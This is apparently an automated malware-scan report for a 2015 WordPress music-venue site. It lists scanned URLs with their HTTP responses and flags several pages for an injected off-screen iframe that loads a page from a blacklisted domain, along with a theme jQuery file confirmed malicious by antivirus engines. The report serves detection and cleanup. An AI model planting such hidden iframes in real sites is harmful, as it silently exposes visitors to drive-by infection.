Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecharge.com.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thecharge.com.au/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 11:40:18 GMT Location: http://thecharge.com.au/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/ | 200 OK Content-Length: 42558 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/wp-content/themes/nightclubbing/js/jquery.min.js | 200 OK Content-Length: 72143 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px" Antivirus reports:
| ||
http://thecharge.com.au/wp-content/themes/nightclubbing/js/jquery.aw-showcase.js | 200 OK Content-Length: 29455 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/themes/nightclubbing/js/cufon.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/themes/nightclubbing/js/texgyreadventor.js | 200 OK Content-Length: 17505 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15669 Content-Type: application/javascript | clean |
http://www.thecharge.com.au//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 07 Mar 2015 11:40:39 GMT Pragma: no-cache Location: http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 42450 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 07 Mar 2015 11:40:42 GMT Pragma: no-cache Location: http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/test404page.js | 404 Not Found Content-Length: 42263 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/gigs/ | 200 OK Content-Length: 26690 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/online-store/ | 200 OK Content-Length: 29267 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/photos/ | 200 OK Content-Length: 28467 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecharge.com.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 11:40:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 42558
Content-Type: text/html; charset=UTF-8
X-Pingback: http://thecharge.com.au/xmlrpc.php
X-Powered-By: PHP/5.3.29
...42558 bytes of data.
GET / HTTP/1.1
Host: thecharge.com.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 11:40:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 42558
Content-Type: text/html; charset=UTF-8
X-Pingback: http://thecharge.com.au/xmlrpc.php
X-Powered-By: PHP/5.3.29
...42558 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecharge.com.au
Referer: http://www.google.com/search?q=thecharge.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thecharge.com.au
Referer: http://www.google.com/search?q=thecharge.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.